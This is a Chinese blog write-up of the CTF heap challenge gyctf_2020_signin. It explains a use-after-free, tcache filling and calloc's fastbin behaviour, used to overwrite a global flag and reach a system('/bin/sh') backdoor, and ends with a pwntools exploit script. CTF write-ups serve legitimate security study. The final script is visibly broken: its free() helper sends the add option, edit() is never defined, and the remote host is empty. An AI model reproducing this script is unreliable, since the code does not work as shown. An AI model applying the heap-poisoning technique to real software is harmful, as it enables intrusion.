gyctf_2020_signin【write up】

于 2023-04-14 11:24:53 发布
阅读量93 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/130149596
版权

gyctf_2020_signin

惯例我们先来checksec一下

开启了canary和NX的64位程序

请添加图片描述

放进ida64里看看

main函数setbuf后直接跳转到menu函数没啥营养就不放上来了

menu函数

1 add 添加堆 2 edit 编辑堆 3 delete 删除堆 6 backdoor

请添加图片描述

1 add

没有检查原本的flag[idx]是否为1可以重复申请

请添加图片描述

2 edit

标准的编辑函数

但是由于编辑时没有要求检查flag的值 因此存在uaf漏洞 可以读入大小为0x50的内容

由于cut的值为0 因此只能修改一次

请添加图片描述

3 del

标准的删除函数

请添加图片描述

6 backdoor

我们可以很快的发现存在backdoor函数只要ptr的值为1就可以执行system("/bin/sh")

同时在开头处存在一个calloc函数

calloc函数不会分配tcache中的chunk

那么我们的目标就已经很明了了 只要将ptr篡改成非0即可

请添加图片描述

审题完成 开始解题

由于我们需要将ptr的值改为非零 而calloc只能申请fastbin中的内容

因此我们考虑先将tcache填满 然后将chunk7放进fastbin中

add(0)
add(1)
add(2)
add(3)
add(4)
add(5)
add(6)
add(7)
free(0)
free(1)
free(2)
free(3)
free(4)
free(5)
free(6)#将tcachebin填满
free(7)#将chunk7放进fastbin中

然后我们再申请一个chunk将tcache链空出一个位置

add(0)

然后我们利用edit函数中的uaf漏洞将chunk7(fastbin中的chunk)的fd的值改为ptr-0x10这样的话fastbin就会指向ptr-0x10

payload = p64(0x4040c0-0x10).ljust(0x50,'\x00')
edit(7,payload)

接下来我们执行backdoor函数 从fastbin中取出chunk申请一个

calloc 将这个 chunk7分配出去时,就会认为 fd 指针对应的也是一个 chunk (即将ptr-10),会把这个 chunk 放入 tcache ,而 tcache 中是以 fd 指针连接的,这样 ptr 的值就会被修改为某个 fd 的指针。即ptr不为0进而执行system(/bin/sh)获取控制权

fastbin的fd执政指向的时下一个chunk的prev_size位 而tcachebin中的链表指针指向的是下一个chunk的fd字段

io.sendlineafter('your choice?', '6')
io.interactive()

下图第一张实在edit(7,payload)前 第二张是在edit(7,payload)后 最后一张是最后calloc后

请添加图片描述

exp:

from pwn import*
io=remote('')
elf=ELF('./gyctf_2020_signin')
context.log_lecel='debug'
def add(idx):
    io.recvuntil('choice?')
    io.sendline(b'1')
    io.recvuntil('idx?')
    io.sendline(str(idx))
    
def free(idx):
    io.recvuntil('choice?')
    io.sendline(b'1')
    io.recvuntil('idx?')
    io.sendline(str(idx))
    
add(0)
add(1)
add(2)
add(3)
add(4)
add(5)
add(6)
add(7)
free(0)
free(1)
free(2)
free(3)
free(4)
free(5)
free(6)#将tcachebin填满
free(7)#将chunk7放进fastbin中
payload = p64(0x4040c0-0x10).ljust(0x50,'\x00')
edit(7,payload)
io.sendlineafter('your choice?', '6')
io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ios Sign In With Apple PHP服务器验证问题
baidu_34248947的博客
12-06 3972
Sign In With Apple服务器登录验证有很多问题,官方文档写的也不清不楚,网上资料不算多。 一、验证identityToken有效性和正确性 根据[官方文档](https://developer.apple.com/documentation/signinwithapplerestapi/verifying_a_user)说明,identityToken是一个JWT算法格式,要使用JW...
gyctf_2020_signin(calloc特性,uaf,tcache特性)
m0_51251108的博客
11-04 475
gyctf_2020_signin: 参考师傅:yongbaoii 逆向分析: 主界面: 三个功能,add,edit,free,还有个backdoor add函数: edit函数: free函数: 有个标记检查,doublefree不能用了 backdoor: 还有个calloc函数 这里分配一个0x70大小的chunk calloc 有以下特性 不会分配 tcache chunk 中的 chunk 。 tcache 有以下特性 在分配 fastbin 中的 chunk 时若还有其他相同大
calloc with tcache&&gyctf_2020_signin
azraelxuemo的博客
03-25 966
文章目录gyctf_2020_signin分析add函数deleteeditbackdoor思路__libc_callo_int_malloc回到题目 今天做了一道题目,利用了glibc-2.27里面的一个新机制,感觉自己对于glibc-2.23和glibc-2.27的区别还不是很明确,那么我们来比对一下这两个版本的一些函数 一直有这样的一种思维嘛,对于glibc2.27来说,释放的内存会先进入tcache,如果大小合适会从tcache里面优先分配,我们来看看原因 上图是__libc_malloc里面的执
(翻译)‘Sign Up’ 和‘Sign In’按钮让用户混淆的原因
gc_2299的博客
07-25 4441
你能多快看出“Sign Up(PS:注册)”和“Sign In(PS:登录)”的区别?将它们作为按钮名称同时使用,会让用户点错按钮。出现上述问题并不是用户的错,而是它们两个太像了
苹果手机signin_苹果iphone弹出sign in to itunes store怎么办
weixin_28898707的博客
12-23 5467
苹果iphone弹出sign in to itunes store怎么办?容易模仿的弹出框iPhone和iPad用户已经习惯了苹果官方弹窗,之后在其中输入Apple ID和密码,这种弹窗不一定会出现在App Store或iTunes应用程序中。采用UIAlertController模拟系统密码请求弹窗的设计样式,第三方App开发者可以创建一个完全相同的弹窗用作钓鱼工具,可能很多人会上当。这只是一次...
Sign in Sign up 区别
Kester_的博客
01-09 1686
解释 Sign in 是登录, Sign up 是注册, 登录 GitHub 不要再搞错了~
BUUCTF:[BJDCTF2020]signin
Starbright.的博客
01-15 1982
1.打开发现是16进制数,一转码发现就是flag。
支付宝支付报错:INVALID_SIGN: Alipay Sign Verify FAILED 决办法
lw545034502的博客
04-09 9540
报错: 这种问题;8成是秘钥出问题了 ,可以去百度代码比对器里面比对一下代码里的密钥跟你生成的是否一样; 要保证: 1 :拿应用公钥去生成支付宝公钥. 代码的配置文件填的也是支付宝公钥. 2.保证公钥 私钥中不能有空格,要在一行,不能有回车. ...
[sign in和sign up哪个是注册?哪个是登入?]
热门推荐
ILOVEYOU218的博客
08-21 1万+
如果是网站的话sign up是注册,sign in是登录的意思,另外,sign out退出。
git clone 重新定向sign_in
Luckyzhoufangbing的博客
08-13 7684
git clone 项目的时候 发现重定向到了登陆页面 解决方法: 不用 https的地址。https的需要登陆,改成 用SSH的地址克隆即可~
cryptocurrency_signIn_signUp_flutter
03-27
cryptocurrency_signin_signup 一个新的Flutter应用程序。 入门 该项目是Flutter应用程序的起点。 如果这是您的第一个Flutter项目,那么有一些资源可以帮助您入门: 要获得Flutter入门方面的帮助,请查看我们的,...
SignUp_Signin_API
03-19
《C#中的SignUp_Signin_API详解》 在软件开发中,用户注册(SignUp)和登录(Signin)是至关重要的功能,它们构成了系统与用户交互的基础。在C#编程环境中,开发这样的功能通常涉及到HTTP请求、身份验证、数据持久...
sign_javascript_开源_SiGN标记_消息机制_2020_
10-03
"Sign_javascript_开源_SiGN标记_消息机制_2020_"这一项目,正是一个基于JavaScript的开源解决方案,它专注于提供高效、灵活的事件绑定和解绑功能,以及一种称为SiGNSignal)的标记系统,用于实现组件间的通信。...
Android_app_signup-in
06-07
以上就是关于"Android_app_signup-in"主题涉及的主要知识点。实际项目中,开发者还需要关注用户体验、性能优化、适配不同设备屏幕等方面。通过熟练掌握这些技术,可以创建出高效、安全的用户注册和登录系统。
api_signup_signin:API RestFull de sign up e登录在usuários
03-11
本项目“api_signup_signin”显然关注的是用户注册(sign up)和登录(signin)的RESTful API设计,这是任何Web应用程序的基础部分。REST(Representational State Transfer)是一种网络应用程序的设计风格和开发...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8338
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
07-17
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
torchaudio-0.13.1+cpu-cp39-cp39-win_amd64.whl
最新发布
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
出入库存盘点表-图表分析-分类查询-Excel模板
07-17
【作品名称】:出入库存盘点表-图表分析-分类查询-Excel模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
GoogleSignInOptions.DEFAULT_GAMES_SIGN_IN
06-08
`GoogleSignInOptions.DEFAULT_GAMES_SIGN_IN` 是 Google Sign-In API 提供的一个常量,用于配置 Google Sign-In 以便于用户可以使用他们的 Google 账号登录游戏服务。该常量会配置以下选项: - 请求用户授权访问其基本信息和玩家信息。 - 请求用户授权访问他们的游戏账户。 - 自动请求 Google Play 游戏服务授权。 - 启用保存用户登录状态。 使用该常量可以方便地配置 Google Sign-In API,以便于在游戏中使用 Google Sign-In 登录。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值